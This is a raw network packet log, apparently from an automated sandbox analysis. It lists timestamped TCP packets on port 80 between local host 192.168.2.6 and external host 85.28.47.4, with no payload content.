Jul 3, 2024 18:08:39.158930063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.158951998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159060955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159106970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159194946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159204960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159215927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159226894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159235001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159238100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159249067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159260035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159261942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159270048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159281969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159284115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159302950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159322977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159480095 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159490108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159522057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159648895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159658909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159668922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159679890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159688950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159699917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159703016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159710884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159722090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159722090 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159732103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159739017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159744024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159758091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.159760952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159785032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.159802914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160054922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160069942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160080910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160090923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160098076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160101891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160111904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160118103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160135031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160145998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160150051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160156965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160167933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160173893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160177946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160188913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160200119 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160204887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160207033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160229921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160263062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160491943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160502911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160520077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160531044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160537004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160542011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160552979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160562038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160563946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160573959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160583973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160584927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160595894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160613060 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160636902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160790920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160809040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160819054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160830021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160840034 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160840034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160855055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160862923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160892010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.160904884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.160948038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161124945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161134958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161145926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161155939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161165953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161166906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161175966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161178112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161185980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161197901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161206961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161209106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161220074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161223888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161231041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161241055 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161252022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161253929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161262035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161273003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161283016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161283970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161299944 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161331892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161509991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161520958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161550999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161557913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161561966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161571980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161581993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161597013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161617994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161793947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161806107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161818981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161829948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161834955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161840916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161850929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161860943 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161863089 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161871910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161881924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.161895990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161909103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.161940098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.162014008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162024975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162034988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162045956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162056923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162062883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.162066936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.162081957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.162100077 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.246988058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247050047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247061014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247090101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247100115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247122049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247132063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247198105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247198105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247198105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247198105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247203112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247241020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247303009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247314930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247325897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247340918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247351885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247354031 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247364998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247384071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247409105 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247467995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247507095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247564077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247575045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247585058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247596025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247613907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247637033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247693062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247704029 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247714043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247730970 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247741938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247751951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247754097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247770071 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247782946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247802019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.247973919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247984886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.247996092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248024940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248042107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248229027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248239994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248250961 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248262882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248270988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248272896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248284101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248295069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248302937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248306036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248316050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248318911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248327971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248344898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248361111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248526096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248537064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248547077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248563051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248574018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248578072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248584032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248590946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248594999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248605967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248615026 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248616934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248627901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248637915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.248641968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248668909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.248680115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249053955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249063969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249074936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249084949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249095917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249102116 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249109983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249120951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249131918 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249131918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249142885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249149084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249152899 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249164104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249172926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249183893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249214888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249378920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249389887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249406099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249417067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249422073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249427080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249440908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249465942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249509096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249520063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249530077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249541998 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249547005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249552011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249562979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249564886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249573946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249583960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249591112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249594927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249615908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249634027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249938011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249948978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249965906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.249978065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.249995947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250128984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250140905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250157118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250166893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250175953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250178099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250189066 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250193119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250214100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250224113 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250225067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250235081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250246048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250252962 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250256062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250267982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250271082 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250278950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250288963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250299931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250300884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250314951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250334024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250339985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250350952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250354052 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250360966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250372887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.250381947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.250408888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251035929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251046896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251056910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251068115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251077890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251087904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251087904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251104116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251106024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251115084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251126051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251127005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251136065 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251147032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251152992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251157999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251168966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.251183987 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.251199961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336010933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336070061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336081982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336219072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336219072 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336225986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336237907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336250067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336261988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336379051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336390018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336400986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336400986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336400986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336411953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336412907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336422920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336435080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336446047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336447954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.336457014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.336467981 CEST	80	49710	85.28.47.4	192.168.2.6
